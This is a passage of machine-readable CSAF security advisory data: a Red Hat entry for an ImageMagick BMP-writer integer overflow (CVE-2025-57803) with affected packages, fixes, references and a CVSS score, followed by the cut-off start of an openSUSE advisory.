"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64"
},
"product_reference": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le"
},
"product_reference": "ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x"
},
"product_reference": "ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x",
"relates_to_product_reference": "7Server-optional-ELS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64 as a component of Red Hat Enterprise Linux Server Optional (v. 7 ELS)",
"product_id": "7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64"
},
"product_reference": "ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64",
"relates_to_product_reference": "7Server-optional-ELS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-57803",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2025-08-26T18:00:53.793212+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2391093"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ImageMagick. In 32-bit builds, the Bitmap encoder miscalculates the stride value when processing images with very large with. Mathematically, the stride value is calculated as width multiplied by 3 but the theoretical limit of such value is 2^32 for 32-bit integers. So, if this value is exceeded, the encoder uses modulo to convert it down and then takes the smaller value as the actual stride length. This is problematic because the pixel data starts to overlap when being added to the buffer due to the small stride value messing up the rows. This heap buffer overflow allows an attacker to cause a denial of service or, with crafted input, potentially execute arbitrary code.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "imagemagick: ImageMagick (WriteBMPImage): 32-bit integer overflow when writing BMP scanline stride \u2192 heap buffer overflow",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is specific to 32-bit ImageMagick builds. Red Hat predominantly only ships 64-bit builds of Kea on its platforms and so the vulnerability affects only customers that install i686 arch rpm packages as these are the only 32-bit builds Red Hat provides. The flaw occurs in the WriteBMPImage function when computing bytes_per_line for 24-bpp BMP images. An integer overflow causes the stride to underflow to a small value, while the writer still emits 3 \u00d7 width bytes per row. The mismatch immediately produces a large, attacker-controlled heap overwrite.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.src",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.src",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-57803"
},
{
"category": "external",
"summary": "RHBZ#2391093",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2391093"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-57803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-57803"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-57803",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57803"
},
{
"category": "external",
"summary": "https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7",
"url": "https://github.com/ImageMagick/ImageMagick/commit/2c55221f4d38193adcb51056c14cf238fbcc35d7"
},
{
"category": "external",
"summary": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm",
"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mxvv-97wh-cfmm"
},
{
"category": "external",
"summary": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1",
"url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.8.1"
}
],
"release_date": "2025-08-26T17:25:59.148000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-09-22T05:39:13+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.src",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.src",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:16313"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.src",
"7Server-ELS:ImageMagick-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x",
"7Server-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.src",
"7Server-optional-ELS:ImageMagick-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-c++-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-c++-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-debuginfo-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.i686",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-devel-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-doc-0:6.9.10.68-9.el7_9.x86_64",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.ppc64le",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.s390x",
"7Server-optional-ELS:ImageMagick-perl-0:6.9.10.68-9.el7_9.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "imagemagick: ImageMagick (WriteBMPImage): 32-bit integer overflow when writing BMP scanline stride \u2192 heap buffer overflow"
}
]
}
opensuse-su-2025:15498-1
Vulnerability from csaf_opensuse
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "ImageMagick-7.1.2.2-2.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the ImageMagick-7.1.2.2-2.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
